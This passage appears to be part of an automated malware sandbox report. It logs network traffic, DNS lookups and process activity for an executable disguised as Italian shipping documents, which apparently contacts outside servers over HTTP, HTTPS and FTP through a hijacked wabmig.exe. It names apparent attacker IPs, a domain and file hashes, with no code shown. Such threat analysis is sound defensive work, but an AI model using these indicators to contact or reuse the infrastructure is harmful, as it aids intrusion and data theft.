Sep 25, 2024 12:35:49.628901958 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628916979 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628931046 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628945112 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.628947020 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628973007 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.628992081 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.629468918 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.629483938 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.629499912 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.629529953 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.629530907 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.629549980 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.629654884 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.629698992 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.639694929 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.639743090 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.639758110 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.639792919 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.639800072 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.639816999 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.639816999 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.639834881 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.639848948 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.639849901 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.639868021 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.639873028 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.639899015 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.639930010 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.640312910 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.640342951 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.640394926 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.640481949 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.640492916 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.640499115 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.640516043 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.640553951 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.640583992 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.640599966 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.640615940 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.640626907 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.640711069 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.641356945 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.641424894 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.641432047 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.641441107 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.641457081 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.641473055 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.641489029 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.641529083 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.641611099 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.642203093 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.642234087 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.642249107 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.642270088 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.642275095 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.642290115 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.642307043 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.642322063 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.642401934 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.643104076 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.643126965 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.643143892 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.643158913 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.643176079 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.643182993 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.643254042 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.684669018 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.684760094 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.684792995 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.684797049 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.684827089 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.684829950 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.684864044 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.684864044 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695363045 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695444107 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695444107 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695480108 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695491076 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695514917 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695523977 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695552111 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695557117 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695585966 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695597887 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695621014 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695626974 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695656061 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695662022 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695704937 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695776939 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695811987 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695830107 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695846081 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695853949 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695879936 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695888996 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695914030 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695920944 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695947886 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.695959091 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.695991993 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.696002960 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.696052074 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705234051 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705291033 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705312967 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705319881 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705336094 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705362082 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705377102 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705421925 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705427885 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705462933 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705471039 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705497026 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705502033 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705539942 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705792904 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705845118 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705847979 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705893040 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705898046 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705933094 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705946922 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.705966949 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.705974102 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.706011057 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.706423998 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.706458092 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.706479073 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.706492901 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.706500053 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.706526995 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.706537008 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.706562996 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.706572056 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.706598997 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.706604004 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.706648111 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.707082033 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.707189083 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.707271099 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.707304001 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.707334995 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.707339048 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.707360983 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.707372904 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.707396984 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.707421064 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.707432032 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.707456112 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.707472086 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.707493067 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.707505941 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.707537889 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.708492041 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.708524942 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.708548069 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.708556890 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.708559036 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.708595037 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.708604097 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.708645105 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716367006 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716429949 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716430902 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716460943 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716473103 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716506004 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716512918 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716547012 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716558933 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716581106 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716597080 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716615915 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716625929 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716655970 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716877937 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716911077 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716931105 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716944933 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716953993 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.716979980 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.716990948 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.717020035 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.717263937 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.717297077 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.717315912 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.717330933 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.717341900 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.717365980 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.717374086 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.717401028 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.717406988 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.717451096 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:50.036988020 CEST | 49738 | 443 | 192.168.2.4 | 172.67.74.152 |
Sep 25, 2024 12:35:50.037049055 CEST | 443 | 49738 | 172.67.74.152 | 192.168.2.4 |
Sep 25, 2024 12:35:50.037111998 CEST | 49738 | 443 | 192.168.2.4 | 172.67.74.152 |
Sep 25, 2024 12:35:50.050549984 CEST | 49738 | 443 | 192.168.2.4 | 172.67.74.152 |
Sep 25, 2024 12:35:50.050570011 CEST | 443 | 49738 | 172.67.74.152 | 192.168.2.4 |
Sep 25, 2024 12:35:50.512327909 CEST | 443 | 49738 | 172.67.74.152 | 192.168.2.4 |
Sep 25, 2024 12:35:50.512413979 CEST | 49738 | 443 | 192.168.2.4 | 172.67.74.152 |
Sep 25, 2024 12:35:50.514339924 CEST | 49738 | 443 | 192.168.2.4 | 172.67.74.152 |
Sep 25, 2024 12:35:50.514352083 CEST | 443 | 49738 | 172.67.74.152 | 192.168.2.4 |
Sep 25, 2024 12:35:50.514677048 CEST | 443 | 49738 | 172.67.74.152 | 192.168.2.4 |
Sep 25, 2024 12:35:50.562341928 CEST | 49738 | 443 | 192.168.2.4 | 172.67.74.152 |
Sep 25, 2024 12:35:50.737133026 CEST | 49738 | 443 | 192.168.2.4 | 172.67.74.152 |
Sep 25, 2024 12:35:50.779403925 CEST | 443 | 49738 | 172.67.74.152 | 192.168.2.4 |
Sep 25, 2024 12:35:50.840887070 CEST | 443 | 49738 | 172.67.74.152 | 192.168.2.4 |
Sep 25, 2024 12:35:50.841284990 CEST | 443 | 49738 | 172.67.74.152 | 192.168.2.4 |
Sep 25, 2024 12:35:50.841370106 CEST | 49738 | 443 | 192.168.2.4 | 172.67.74.152 |
Sep 25, 2024 12:35:50.864151955 CEST | 49738 | 443 | 192.168.2.4 | 172.67.74.152 |
Sep 25, 2024 12:35:52.512583017 CEST | 49739 | 21 | 192.168.2.4 | 192.185.13.234 |
Sep 25, 2024 12:35:52.518481970 CEST | 21 | 49739 | 192.185.13.234 | 192.168.2.4 |
Sep 25, 2024 12:35:52.518573046 CEST | 49739 | 21 | 192.168.2.4 | 192.185.13.234 |
Sep 25, 2024 12:35:52.520402908 CEST | 49739 | 21 | 192.168.2.4 | 192.185.13.234 |
Sep 25, 2024 12:35:52.525293112 CEST | 21 | 49739 | 192.185.13.234 | 192.168.2.4 |
Sep 25, 2024 12:35:52.525358915 CEST | 49739 | 21 | 192.168.2.4 | 192.185.13.234 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 25, 2024 12:35:50.022074938 CEST | 49583 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 25, 2024 12:35:50.030332088 CEST | 53 | 49583 | 1.1.1.1 | 192.168.2.4 |
Sep 25, 2024 12:35:52.165589094 CEST | 50414 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 25, 2024 12:35:52.509350061 CEST | 53 | 50414 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Sep 25, 2024 12:35:50.022074938 CEST | 192.168.2.4 | 1.1.1.1 | 0x782c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 25, 2024 12:35:52.165589094 CEST | 192.168.2.4 | 1.1.1.1 | 0xc1cf | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Sep 25, 2024 12:35:50.030332088 CEST | 1.1.1.1 | 192.168.2.4 | 0x782c | No error (0) | 172.67.74.152 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 12:35:50.030332088 CEST | 1.1.1.1 | 192.168.2.4 | 0x782c | No error (0) | 104.26.13.205 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 12:35:50.030332088 CEST | 1.1.1.1 | 192.168.2.4 | 0x782c | No error (0) | 104.26.12.205 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 12:35:52.509350061 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1cf | No error (0) | concaribe.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 25, 2024 12:35:52.509350061 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1cf | No error (0) | 192.185.13.234 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49737 | 185.29.11.53 | 80 | 2124 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 12:35:48.694613934 CEST | 177 | OUT | |
Sep 25, 2024 12:35:49.297199011 CEST | 1236 | IN | |
Sep 25, 2024 12:35:49.297240019 CEST | 224 | IN | |
Sep 25, 2024 12:35:49.297278881 CEST | 1236 | IN | |
Sep 25, 2024 12:35:49.297312975 CEST | 224 | IN | |
Sep 25, 2024 12:35:49.297343969 CEST | 1236 | IN | |
Sep 25, 2024 12:35:49.297379971 CEST | 1236 | IN | |
Sep 25, 2024 12:35:49.297415972 CEST | 448 | IN | |
Sep 25, 2024 12:35:49.374283075 CEST | 1236 | IN | |
Sep 25, 2024 12:35:49.374325037 CEST | 1236 | IN | |
Sep 25, 2024 12:35:49.374363899 CEST | 448 | IN | |
Sep 25, 2024 12:35:49.374408007 CEST | 1236 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49738 | 172.67.74.152 | 443 | 2124 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-25 10:35:50 UTC | 155 | OUT | |
2024-09-25 10:35:50 UTC | 211 | IN | |
2024-09-25 10:35:50 UTC | 11 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 06:34:34 |
Start date: | 25/09/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 06:34:34 |
Start date: | 25/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 06:34:34 |
Start date: | 25/09/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xca0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 06:34:39 |
Start date: | 25/09/2024 |
Path: | \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 748'488 bytes |
MD5 hash: | 6C446FD0A3F6D498F5CBD0725CE7F232 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 6 |
Start time: | 06:34:40 |
Start date: | 25/09/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xca0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 06:34:40 |
Start date: | 25/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
